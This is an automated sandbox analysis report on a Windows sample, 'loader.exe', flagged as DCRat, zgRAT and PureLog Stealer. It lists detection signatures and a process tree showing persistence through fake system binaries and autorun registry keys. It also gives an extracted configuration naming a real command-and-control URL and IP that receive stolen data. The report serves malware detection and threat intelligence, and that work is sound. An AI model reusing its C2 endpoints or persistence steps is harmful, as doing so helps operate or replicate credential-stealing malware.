Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
loader.exe

Overview

General Information

Sample name:loader.exe
Analysis ID:1588885
MD5:2307ca04c2633d28345fb0580c77c2ec
SHA1:edbd1f092ed03cb2674877aba6e874722ee07814
SHA256:168637ea64d64afefd1f88b91ffecb74715ccb6a98acf73d4a16175511628276
Tags:DCRatexeNyashTeamuser-MalHunter
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Hides threads from debuggers
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has nameless sections
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to harvest and steal browser information (history, passwords, etc)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • loader.exe (PID: 6104 cmdline: "C:\Users\user\Desktop\loader.exe" MD5: 2307CA04C2633D28345FB0580C77C2EC)
    • wscript.exe (PID: 3960 cmdline: "C:\Windows\System32\WScript.exe" "C:\ServerWinRuntimeBroker\OAKCwEsKnudXsAgphVRYMDBaoP2ZIjCO6J5QYyd0q81GMNjCqOkwlC1.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 2056 cmdline: C:\Windows\system32\cmd.exe /c ""C:\ServerWinRuntimeBroker\wJc3A8cK4hSMmtCgCMOA49.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chainPorthostCommon.exe (PID: 2308 cmdline: "C:\ServerWinRuntimeBroker/chainPorthostCommon.exe" MD5: CF5B49706562BA2047CDA4A451DD573A)
          • csc.exe (PID: 1484 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xiz5tqzr\xiz5tqzr.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • conhost.exe (PID: 4828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cvtres.exe (PID: 828 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBF2D.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1E4D641D33A148FC98C6B9EA6A6669B1.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • csc.exe (PID: 6880 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\d135vvi0\d135vvi0.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • conhost.exe (PID: 4232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cvtres.exe (PID: 5980 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC121.tmp" "c:\Windows\System32\CSCE59377155588453BA4975E271891CFF.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • cmd.exe (PID: 5236 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\HArqwkOZhw.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 5648 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • w32tm.exe (PID: 3384 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
            • RuntimeBroker.exe (PID: 6008 cmdline: "C:\Windows\LiveKernelReports\RuntimeBroker.exe" MD5: CF5B49706562BA2047CDA4A451DD573A)
  • dasHost.exe (PID: 3404 cmdline: "C:\Windows\DiagTrack\Scenarios\dasHost.exe" MD5: CF5B49706562BA2047CDA4A451DD573A)
  • conhost.exe (PID: 1488 cmdline: "C:\Recovery\conhost.exe" MD5: CF5B49706562BA2047CDA4A451DD573A)
  • tQESKTdysPpsVzUyXTE.exe (PID: 2360 cmdline: "C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe" MD5: CF5B49706562BA2047CDA4A451DD573A)
  • chainPorthostCommon.exe (PID: 2884 cmdline: "C:\ServerWinRuntimeBroker\chainPorthostCommon.exe" MD5: CF5B49706562BA2047CDA4A451DD573A)
  • dasHost.exe (PID: 5872 cmdline: "C:\Windows\DiagTrack\Scenarios\dasHost.exe" MD5: CF5B49706562BA2047CDA4A451DD573A)
  • conhost.exe (PID: 4024 cmdline: "C:\Recovery\conhost.exe" MD5: CF5B49706562BA2047CDA4A451DD573A)
  • tQESKTdysPpsVzUyXTE.exe (PID: 5132 cmdline: "C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe" MD5: CF5B49706562BA2047CDA4A451DD573A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary", "MUTEX": "DCR_MUTEX-eaeo9JEo1ruqi45TCDYM", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
loader.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    loader.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Windows\DiagTrack\Scenarios\dasHost.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Windows\DiagTrack\Scenarios\dasHost.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\ServerWinRuntimeBroker\chainPorthostCommon.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            C:\ServerWinRuntimeBroker\chainPorthostCommon.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Program Files (x86)\Microsoft\csrss.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                Click to see the 7 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000011.00000002.3435800974.0000000003CBC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                  00000000.00000003.2162490833.0000000005BE3000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    00000000.00000003.2161189771.0000000007387000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      00000011.00000002.3435800974.00000000037B4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                        00000005.00000000.2286038382.00000000004B2000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                          Click to see the 5 entries

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          0.3.loader.exe.5d2d70d.1.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            0.3.loader.exe.5d2d70d.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                              0.3.loader.exe.74d170d.0.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                0.3.loader.exe.74d170d.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                                  5.0.chainPorthostCommon.exe.4b0000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                    Click to see the 5 entries

                                    Sigma Signatures

                                    System Summary

                                    barindex
                                    Sigma detected: Files With System Process Name In Unsuspected Locations
                                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe, ProcessId: 2308, TargetFilename: C:\Recovery\conhost.exe
                                    Sigma detected: System File Execution Location Anomaly
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Windows\LiveKernelReports\RuntimeBroker.exe" , CommandLine: "C:\Windows\LiveKernelReports\RuntimeBroker.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\LiveKernelReports\RuntimeBroker.exe, NewProcessName: C:\Windows\LiveKernelReports\RuntimeBroker.exe, OriginalFileName: C:\Windows\LiveKernelReports\RuntimeBroker.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\HArqwkOZhw.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5236, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\LiveKernelReports\RuntimeBroker.exe" , ProcessId: 6008, ProcessName: RuntimeBroker.exe
                                    Sigma detected: CurrentVersion Autorun Keys Modification
                                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Windows\LiveKernelReports\RuntimeBroker.exe", EventID: 13, EventType: SetValue, Image: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe, ProcessId: 2308, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker
                                    Sigma detected: CurrentVersion NT Autorun Keys Modification
                                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Windows\LiveKernelReports\RuntimeBroker.exe", EventID: 13, EventType: SetValue, Image: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe, ProcessId: 2308, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                                    Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xiz5tqzr\xiz5tqzr.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xiz5tqzr\xiz5tqzr.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\ServerWinRuntimeBroker/chainPorthostCommon.exe", ParentImage: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe, ParentProcessId: 2308, ParentProcessName: chainPorthostCommon.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xiz5tqzr\xiz5tqzr.cmdline", ProcessId: 1484, ProcessName: csc.exe
                                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\ServerWinRuntimeBroker\OAKCwEsKnudXsAgphVRYMDBaoP2ZIjCO6J5QYyd0q81GMNjCqOkwlC1.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\ServerWinRuntimeBroker\OAKCwEsKnudXsAgphVRYMDBaoP2ZIjCO6J5QYyd0q81GMNjCqOkwlC1.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\loader.exe", ParentImage: C:\Users\user\Desktop\loader.exe, ParentProcessId: 6104, ParentProcessName: loader.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\ServerWinRuntimeBroker\OAKCwEsKnudXsAgphVRYMDBaoP2ZIjCO6J5QYyd0q81GMNjCqOkwlC1.vbe" , ProcessId: 3960, ProcessName: wscript.exe
                                    Sigma detected: Dynamic CSharp Compile Artefact
                                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe, ProcessId: 2308, TargetFilename: C:\Users\user\AppData\Local\Temp\xiz5tqzr\xiz5tqzr.cmdline

                                    Data Obfuscation

                                    barindex
                                    Sigma detected: Dot net compiler compiles file from suspicious location
                                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xiz5tqzr\xiz5tqzr.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xiz5tqzr\xiz5tqzr.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\ServerWinRuntimeBroker/chainPorthostCommon.exe", ParentImage: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe, ParentProcessId: 2308, ParentProcessName: chainPorthostCommon.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xiz5tqzr\xiz5tqzr.cmdline", ProcessId: 1484, ProcessName: csc.exe

                                    Suricata Signatures

                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2025-01-11T06:43:15.910693+010020480951A Network Trojan was detected192.168.2.65690537.44.238.25080TCP

                                    Joe Sandbox Signatures

                                    Click to jump to signature section

                                    Show All Signature Results

                                    AV Detection

                                    barindex
                                    Antivirus / Scanner detection for submitted sample
                                    Source: loader.exeAvira: detected
                                    Antivirus detection for dropped file
                                    Source: C:\Users\user\Desktop\SSuSBQke.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                    Source: C:\Users\user\Desktop\JgiUHXBa.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                    Source: C:\Users\user\Desktop\pOvooSqL.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                    Source: C:\ServerWinRuntimeBroker\OAKCwEsKnudXsAgphVRYMDBaoP2ZIjCO6J5QYyd0q81GMNjCqOkwlC1.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\AppData\Local\Temp\HArqwkOZhw.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\Recovery\conhost.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Program Files (x86)\Microsoft\csrss.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\Desktop\keVXUmFt.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Found malware configuration
                                    Source: 00000005.00000002.2357344463.0000000012B88000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary", "MUTEX": "DCR_MUTEX-eaeo9JEo1ruqi45TCDYM", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                                    Multi AV Scanner detection for dropped file
                                    Source: C:\Program Files (x86)\Microsoft\csrss.exeReversingLabs: Detection: 82%
                                    Source: C:\Recovery\conhost.exeReversingLabs: Detection: 82%
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeReversingLabs: Detection: 82%
                                    Source: C:\Users\user\Desktop\BLdnhdFQ.logReversingLabs: Detection: 37%
                                    Source: C:\Users\user\Desktop\JgiUHXBa.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\PHEbWhMM.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\SSuSBQke.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\XCTiUwVw.logReversingLabs: Detection: 37%
                                    Source: C:\Users\user\Desktop\keVXUmFt.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\kmFpzVgz.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\pOvooSqL.logReversingLabs: Detection: 50%
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeReversingLabs: Detection: 82%
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeReversingLabs: Detection: 82%
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeReversingLabs: Detection: 82%
                                    Multi AV Scanner detection for submitted file
                                    Source: loader.exeVirustotal: Detection: 76%Perma Link
                                    Source: loader.exeReversingLabs: Detection: 68%
                                    AI detected suspicious sample
                                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                                    Machine Learning detection for dropped file
                                    Source: C:\Users\user\Desktop\JgiUHXBa.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\ZPhRdffT.logJoe Sandbox ML: detected
                                    Source: C:\Windows\System32\SecurityHealthSystray.exeJoe Sandbox ML: detected
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeJoe Sandbox ML: detected
                                    Source: C:\Recovery\conhost.exeJoe Sandbox ML: detected
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Microsoft\csrss.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\OTzTkTQO.logJoe Sandbox ML: detected
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\keVXUmFt.logJoe Sandbox ML: detected
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJoe Sandbox ML: detected
                                    Machine Learning detection for sample
                                    Source: loader.exeJoe Sandbox ML: detected
                                    Sample uses string decryption to hide its real strings
                                    Source: 00000005.00000002.2357344463.0000000012B88000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-eaeo9JEo1ruqi45TCDYM","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
                                    Source: 00000005.00000002.2357344463.0000000012B88000.00000004.00000800.00020000.00000000.sdmpString decryptor: [["http://373292cm.nyashka.top/","JavascriptSecureSqlLocalTemporary"]]
                                    Source: loader.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: loader.exe, loader.exe, 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp
                                    Source: Binary string: :C:\Users\user\AppData\Local\Temp\xiz5tqzr\xiz5tqzr.pdb source: chainPorthostCommon.exe, 00000005.00000002.2352626856.000000000319A000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: :C:\Users\user\AppData\Local\Temp\d135vvi0\d135vvi0.pdb source: chainPorthostCommon.exe, 00000005.00000002.2352626856.000000000319A000.00000004.00000800.00020000.00000000.sdmp

                                    Spreading

                                    barindex
                                    Infects executable files (exe, dll, sys, html)
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0063A69B FindFirstFileW,FindFirstFileW,0_2_0063A69B
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior

                                    Networking

                                    barindex
                                    Suricata IDS alerts for network traffic
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.6:56905 -> 37.44.238.250:80
                                    Source: global trafficTCP traffic: 192.168.2.6:55549 -> 1.1.1.1:53
                                    Source: Joe Sandbox ViewIP Address: 37.44.238.250 37.44.238.250
                                    Source: Joe Sandbox ViewASN Name: HARMONYHOSTING-ASFR HARMONYHOSTING-ASFR
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 384Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 1872Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
